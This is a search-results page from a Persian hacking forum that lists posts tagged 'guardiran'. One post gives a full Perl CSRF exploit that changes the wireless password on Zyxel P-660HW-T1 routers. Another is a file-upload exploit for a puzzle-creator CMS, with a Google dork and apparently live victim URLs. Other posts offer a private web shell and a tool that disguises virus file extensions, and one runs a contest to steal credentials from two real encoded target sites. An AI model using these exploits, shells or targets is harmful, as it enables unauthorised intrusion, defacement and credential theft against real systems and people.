جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'guardiran'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

12 نتیجه پیدا شد

  1. ثبت اکسپلویت ( Zyxel P-660HW-TI V3 ADSL CSRF ( change password #!/usr/bin/perl ########################################################### # Title : Zyxel P-660HW-TI V3 ADSL CSRF ( change password ) # Author : dr-iman/GIST # Exploit Type : Perl/Remote # Date : 3 Feb 2018 # Vendor : https://www.zyxel.com/support/DownloadLandingSR.shtml?c=gb&l=en&kbid=MD08229&md=P-660HW-T1%20v3 # Tested : Ubuntu - Windows 10 # GIST : c0d3!nj3ct!0n , REX , 0r0b4s , Mownten , AliZombie , MR.Python , Phoen1X ########################################################### # Zyxel P-660HW-T1 v3 Wireless ADSL Have CSRF Vuln.We can Remotly Change Password Wireless. # The reason for this vulnerability Is After entering the address (change the password) System Will Not Checked Te Password Field # Items needed : Wirelesss ADSL IP , NeW Password # There Is 3 Update For This ADSL Router . All versions are vulnerable use LWP::Simple; use LWP::UserAgent; use HTTP::Request; use HTTP::Request::Common qw(POST); use HTTP::Request::Common qw(GET); use IO::Socket; my $ua = LWP::UserAgent->new; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print <<logo; _____ _ _____ _ _ _ |__ |_ _ _ _ ___| | | __|_ _ ___| |___|_| |_ ___ ___ | __| | |_'_| -_| | | __|_'_| . | | . | | _| -_| _| |_____|_ |_,_|___|_| |_____|_,_| _|_|___|_|_| |___|_| |___| |_| logo print "\nEner IP Address : "; $ip=<>; chomp($ip); print "\nEnter New Passwword : "; $pass=<>; chomp($pass); $url = "$ip/wzPPP.html"; my $content = $ua->get("$url")->content; if ($content =~ /Internet Configuration/ ) { my $wan = $ua->post($url, Content => [ 'next >' => 'submit',]); } my $content = $ua->get("$wan")->content; my $wan2 = $ua->post($content, Content => [ 'wzEnableWLAN' => 'WLANACtive', 'next >' => 'submit',]); my $content = $ua->get("$wan2")->content; my $lan = $ua->post($content, Content => [ 'wzWLANCfgHPSK' => $pass, 'next >' => 'submit',]); my $content = $ua->get("$lan")->content; my $fin = $ua->post($content, Content => [ 'Apply' => 'submit',]); if ($fin =~ /Congratulations/) { print "\nPassword Changed Successfully !\n"; } else{ print "\nProcess Failed !!\n"; }
  2. 1TED

    Guardiran Private Shell

    سلام ../ یه مدت پیش یه شلی طراحی شده بود که در بخش زیر زمین نگه داری میشد این تصمیمو گرفتم که این شل رو پابلیک کنم تا دوستان هم بتونن استفاده کافی رو ببرن یا حـ ـق ../ پیوستـ شد priv8.php
  3. به نام خدا برنامه تغییر پسوند ویروس ها و تروجان ها خب شما با این برنامه میتونید ویروس های خودتون رو فرمتشون رو تغییر بدین . پسوند ها رو از راست به چپ بخونید . تصویر برنامه لینک اسکن هم خودتون داخل همین لینک اسکن کنید من اصلا سرعت ندارم . قبل از دانلود اسکن کنید برای اطمینان خودتون آیدی تلگرام جهت انتقاد و پیشنهاد و ساخت ابزار @Edris_Ice Extention Spoofer.exe
  4. * Title: puzzle creator CMS File Upload vulnerability * date: 4/22/2017 * Exploit Author : Gudrdiran Security Team * Google Dork : intitle:"puzzle creator" "index.php=difficulty=" * Softwar Link : http://www.puzzle-maker.com/ * Vendor Homepage: https://www.nimble.com/ * Tested On : Kali Linux w3af / Windows 8.1 ---------------------------------- Description : Hello Guys This is a file upload exploit we can upload our shell With Tamper data or Live Http Header Dir Shell: When You Bypass Your Shell With Tamper Data Or Live Http Header Target Will Be Shown you The URL( Shell ) Usually Dir Shell : /puzzle/name_shell.php Poc: Page vulnerable : [/puzzle/] Exploit : /puzzle/upload.php Demo: http://www.brandonbrady.com/puzzle/upload.php http://www.kidtopia.info/puzzle/upload.php http://www.teachertopia.info/puzzle/upload.php * Special Tnx : cod3!nj3ct!0n , REX , alizombie , abarestan , MR.IMAN , reza attacker , No_one , dastmale-sorkh , 1TED , Reza Attacker , J.ALL_Editor , S9pY, * Discovered By : DeMoN * We Are Guardiran Security Team https://cxsecurity.com/issue/WLB-2017040150
  5. با سلام به دوستان عزیز و گرامی من سوالی برام پیش اومده اینکه من میخوام یک آزمایشگاه تست نفوذ وایرلس درست کنم از اونجایی که کالی لینوکس محدودیت هایی جهت انتخاب کارت شبکه برام به وجود اورده خواستم با نصب اوبنتو و ابزار های لازم جهت تست ازمایشگاه رو راه بندازم سوالم اینه که اگه با کوچ کردن به اوبنتو دیگه لازم نیست کارت شبکه هایی با چیپست ralink rt3070 , ar9271, ralink rt3572 که در کالی جهت تست نفوذ استفاده میشه برای اوبنتو استفاده کنم با هر کارت شبکه ای که لینوکس رو ساپورت میکنه ایا میتونم تست نفوذ انجام بدم ؟ با تشکر
  6. به نام خدا سلام امروز براتون برنامه ایی رو آماده کردم که خیلی کاربردش زیاده و خیلی از جاها بدردتون میخوره و تقریبا یا برنامه کامله که البته چون ورژن یکشه بعضی از قابلیت ها رو نداره که قول بهتون میدم در ورژن های بعد به برنامه اضافه بشه و یک برنامه کامل و زیبا در زمینه هش داشته باشیم اگه استقبال خوب باشه ابزار های دیگه اییم براتون مینویسم که خیلی بدردتون میخوره این برنامه مورد تایید مدیریت ارشد تیم REX قرار گرفته ویژگی ها : - کرک md5 با ده دیتابیس انلاین - کرک sha1 به صورت افلاین (با پسورد لیست) - کرک md5 به صورت افلاین(با پسورد لیست) - تبدیل متن به md5 - تبدیل متن به sha1 - تبدیل متن به sha256 - تبدیل متن به sha384 - تبدیل متن به sha512 - ینکود کردن متن به base64 - دیکود کردن متن از base64 - اینکود کردن متن به hex - و دیکود کردن متن از hex - با قابلیت string reverse چون ورژن اوله و خب وقت کمی حدود دو روز و نصفی براش گذاشته شده قطعا باگ هایی داره و در پ.خ برام ارسال کنید تا در ورژن های بعد درست بشه حجم نرم افزار حدود 6 مگ هست و وقتی فشردش کردم شد 1 و خورده ایی و لینک از انجمن براتون گذاشتم و هم از persiangig عکس از محیط برنامه : لینک دانلود : http://cdn.persiangig.com/download/rkTlyQbmdi/HashTools.rar/dl لینک اسکن : https://virusscan.jotti.org/en-US/filescanjob/n8xnztk6px پیوست هم شد محیطشم که گرافیکیه دیگه نیازی به فیلم آموزشی نداره اما اگه نیاز داشتید بگید تا براتون بزارم پسورد : guardiran.org حتما نظرات و پیشنهاداتون رو برام پ . خ کنید HashTools.rar
  7. با سلام خدمت دوستان این تاپیک ایجاد شده تا هکران عزیز گادرایران سایت هایی رو که مورد نفوذ قرار دادند رو اطلاعاتی رو که برای مبتدیان به درد م یخوره برملا کنند که این کار می تونه جالب باشه.! قوانین: - سایت های ایرانی کاملا ممنوع 2- اسپم = اخطار باسپاس و یاعلی​
  8. به نام خدا سلام خدمت دوستان عزیز. بعد از پایان مسابقه شماره 3 طبق وعده ما بعد از دو روز مسابقه بعدی یعنی مسابقه شماره 4 برگزار میشه. تا الان استقبال خوبی از مسابقات شده بود و امیدوارم که همینطور ادامه پیدا کنه. خوب دوستان این مسابقه هم از سری مسابقات آشنایی با انواع باگ های هست و امیدوارم که دوستان بتونن پاسخ مسابقه رو پیدا کنند. قوانین: 1-اسپم در این پست ممنوع بوده و در صورت مشاهده به شدت برخورد میشه. 2-پاسخ رو با این عنوان ارسال کنید و اگر نه پاسخ داده نمیشه([Answer Racing 4]) 3-درخواست هرگونه راهنمایی و.. ممنوع بوده 4-در این پست فقط یک عکس از پیج یوزر و پس بفرستین و URL تارگت رو پ.خ کنیید. بریم سراغ مسباقه مسابقه ما از مسابقات رده Medium یک فرقی عمده ای که این مسابقه با بقیه داره اینکه ما اینبار دو سایت رو مورد حمله قرار میدیم با یک آسیب پذیری مشابه. خوب شما دوستان باید با آسیب پذیری های موجود یوزر و پسورد های سایت رو مطابق شکل زیر به دست بیارین و برای بنده ارسال کنید. تارگت مسابقه با توجه به مشکلات پیش اومده در مسابقه قبلی با یک الگوریتم ساده کد گذاری شده. خوب ابتدا تارگت های مسابقه: تارگت شماره 1: L3RhLmRhYy1ub2NyYS53d3cvLzpwdHRo تارگت شماره 2: cGhwLnhlZG5pL2dyby5tb3NlaHQud3d3Ly86cHR0aA== با توجه به تارگت ها خیلی راحت نوع کدگذاری مشخص میشه. تارگت بسیار سادست و به راحتی اگر با باگ موردنظر ما آشنایی داشته باشین با نگاه به عکس میفهمین که چه نوع باگی هست و حتی میتونین پیج رو تشخیص بدین. (از عکس ها مشخصه باگ SQL Injection نیست و مشخصه که از چه باگی استفاده شده). جایزه : به دست آوردن یوزر و پسورد یک تارگت: پکیج لوکال روت از سال 2003-2014 حل معمای هر دو تارگت: پکیج لوکال روت از سال 2003-2014+لوکال روت 2015 PRIV8 Solvers: Angel0fD3ath html4_4 alireza.eblis22 MRSEZAR Mohammad_black_hat detect0r AgenT j594 darkness-hacker ormazd موفق باشید (ابزار دیکد پیوست شد) زمان مسابقه 4 روز(مسابقه ساعت 6 امروز خاتمه پیدا میکند). Yee7 Cryption 1.2.rar
  9. از آن‌جا که تراشه‌های RFID به‌راحتی هک می‌شوند و هکرها به آسانی می‌توانند بدون نیاز به دسترسی فیزیکی به این تراشه‌ها اقدام به سرقت داده‌های ذخیره شده در آنها کنند، محققان شرکت امنیتی MIT با توسعه روش جدیدی موفق شده‌اند جلوی هک این گونه تراشه‌ها را بگیرند. امروزه تراشه‌های RFID در داخل همه نوع آیتمی گنجانده می‌شوند. از کارت‌های اعتباری، کارت‌های swipe سفر، کتاب‌های کتابخانه‌ای، کارت‌های خرید خواروبار گرفته تا تگ‌های امنیتی، سوابق پزشکی، گذرنامه و حتی کارت‌های ورود به شرکت‌ها، همه و همه دارای تراشه RFID هستند. تراشه RFID در واقع سامانه شناسایی با فرکانس رادیویی (RFID) یک دستگاه کوچک الکترونیکی است که بعد از رمزنگاری داده‌ها بر روی یک تراشه در داخل خود از یک آنتن برای انتقال آن داده‌ها استفاده می‌کند. از این دستگاه معمولاً برای ارتباطات مسافت کوتاه استفاده می‌شود. از آن‌جا که تراشه‌های RFID به‌راحتی هک می‌شوند و هکرها به آسانی می‌توانند بدون نیاز به دسترسی فیزیکی به این تراشه‌ها اقدام به سرقت داده‌های ذخیره شده در آنها کنند، محققان شرکت امنیتی MIT با توسعه روش جدیدی موفق شده‌اند جلوی هک این گونه تراشه‌ها را بگیرند. اگرچه از اطلاعات موجود در تراشه RFID با یک کلید رمزنگاری سری محافظت می‌شود، اما هکرهای ماهر با انجام مکرر حمله Side Channel به این تراشه‌ها، می‌توانند به‌راحتی اطلاعات موجود در آنها را سرقت کنند. حملات Side Channel حملات Side Channel به گونه‌ای طراحی شده‌اند که از طریق آنالیز الگوی به‌کارگیری حافظه یا نواسات استفاده از الکتریسیته می توانند کلید سری رمزنگاری را از یک سیستم بیرون بکشند. با وجود این قابلیت، با هربار حمله Side Channel تنها بخش ناچیزی از اطلاعات الگوریتم رمزنگاری لو می‌رود که به این دلیل هکرها مجبور می‌شوند برای دست‌یابی کامل به کلید سری، چندین بار این نوع حمله را تکرار کنند. حملات Power Glitch اگرچه یکی از راه‌های مقابله با حملات side channel چرخاندن کلید خصوصی به‌صورت مکرر با استفاده از ژنراتور عدد تصادفی بعد از هربار تراکنش است اما یک هکر کارکشته با ترتیب دادن حمله‌ای موسوم به Power Glitch می‌تواند بر این استراتژی غلبه کند. حمله power glitch به روشی اطلاق می‌شود که در آن هکر هربار قبل از آنکه کلید رمزنگاری سری از سوی تراشه تغییر کند، اقدام به قطع جریان الکتریسیته در تراشه می‌کند. با استفاده از این روش، ضمن بی‌اثر شدن راهکار چرخاندن کلید خصوصی، هکر می‌تواند بارها همان حمله Side Channel را برای دست‌یابی به الگو و بیرون کشیدن اطلاعات از تراشه RFID پی‌ریزی کند. طرز کار تراشه جدید ضد هک RFID تولیدی شرکت MIT تراشه RFID جدیدی که از سوی محققان MIT توسعه یافته و از سوی شرکت Texas Instruments تولید شده است، به ادعای محققان، ضمن جلوگیری از انجام شدن حمله power glitch تقریباً در برابر همه نوع روش هکی مقاوم است. این تراشه جدید به‌دلیل برخورداری از یک تأمین کننده on-board جریان الکتریسیته که قطعش تقریباً غیرممکن است و داشتن سلول‌های غیر متغیر حافظه که حتی در صورت قطعی جریان الکتریسیته اقدام به ذخیره محاسبات در حال انجام از سوی تراشه می‌کنند، قادر است از وقوع حملات power glitch جلوگیری کند. برای دست‌یابی به این هدف، تراشه جدید RFID از ماده‌ای با نام Ferroelectric crystals بهره می‌برد. مولکول‌های موجود در این نوع ماده به‌دلیل داشتن چیدمان شبکه‌ای باعث می‌شوند تا بارهای مثبت و منفی به‌صورت طبیعی از هم جدا قرار بگیرند. Ferroelectric crystals با ایفای نقش یک خازن در این تراشه می‌تواند ضمن ذخیره الکتریسیته، موجب ایجاد حافظه رایانه‌ای شود که حتی در زمان قطعی جریان الکتریسیته بتواند از داده‌ها نگهداری کند. به ادعای تیم محققان MIT، اگر این تراشه جدید فوق امن در سطح گسترده‌ای از سوی مردم مورد استفاده قرار گیرد، آمار سرقت اطلات از کارت‌ها و به‌صورت بالقوه امکان کلاه‌برداری از کارت اعتباری تا حد زیادی کاهش می‌یابد.
  10. سلام دوستان!!! تصمیم دارم در این تاپیک هک را به صورت کلاسی در 25 جلسه از ابتدا آموزش بدم...فقط لطفا از قوانین زیر پیروی کنید... 1- در این تاپیک هیچ سوالی پرسیده نشود، فعلا به صورت پیام خصوصی پرسیده شود، اگر سوال مهمی و کاربردی بود، یه تاپیک مخصوص سوالات شما ایجاد می کنم... 2- اسپم ممنوع 3- رعایت نکردن دوقانون بالا = گزارش در این کلاس برای هک فقط آشنایی با شبکه و ویندوز کافی است، بعد از پایان کلاس خودتون می فهمید که چطوری فنون حرفه ای تر یاد بگیرید. این کلاس صرفا برای استارت شما عزیزان است. آنچه در این کلاس می آموزید: 1- آشنایی با شبکه و دستورات لینوکس 2- مرحله شناسایی FootPrinting 3- آنالیز سیستم عامل ها و Scanning 4- EnuMeration 5- Gaining Access 6- Metasploit و Backtrack آشنایی با سیستم عامل 7- Escalating Privilege 8- Creating Backdoors 9- نفوذ و محافظت از کامپیوترهای شخصی 10- تکذیب سرویس یا DoS Attacks 11- نفوذ به وب سایت ها 12- نفوذ و امنیت دیتابیس ها 13- نفوذ و امنیت شبکه های داخلی 14- نصب Rootkit و راه های شناسایی 15- Covering tracks 16- عبور از IDS – FireWall 17- Cryptography 18- نفوذ و امنیت روترها 19- امنیت ایمیل ها و آشنایی با راه های نفوذ 20- نفوذ و امنیت شبکه های Wireless 21- SQL Injection 22- کشف حفره امنیتی command execution 23- کشف حفره امنیتی file inclusion در نرم افزارهای تحت وب 24- کشف حفره امنیتی XSS در نرم افزارهای تحت وب 25- اکسپلویت نویسی به زبان های Perl و PHP در پست بعدی که جلسه ی اول می باشد بخش آشنایی با شبکه و دستورات لینوکس را شروع می کنیم. بین جلساتی زمانی را در نظر می گیریم که شما کاربران عزیز Guardiran یا هکران آینده وقت تمرین داشته باشید. رضایت خود را با تشکر نشان دهید
  11. سلام کسی دیفیس تیم رو نداره بده به امید خدا اگه شد اولین سایت هک شده رو با نام گارد ایران ثبت کنم
  12. درود ثبت اکسپلویت Newtontree it services CMS Sql Injection Vulnerability توسط تیم امنیتی گارد ایران و جای داره از کاربر خوبمون *diamond* عزیز هم تشکر ویژه ای داشته باشیم . لینک اثبات : . http://iedb.ir/author-GuardIran%20Security%20Team.html . با آرزوی موفقیت و بهروزی برای تمامیه عزیزان در عرصه امنیت سایبرکشور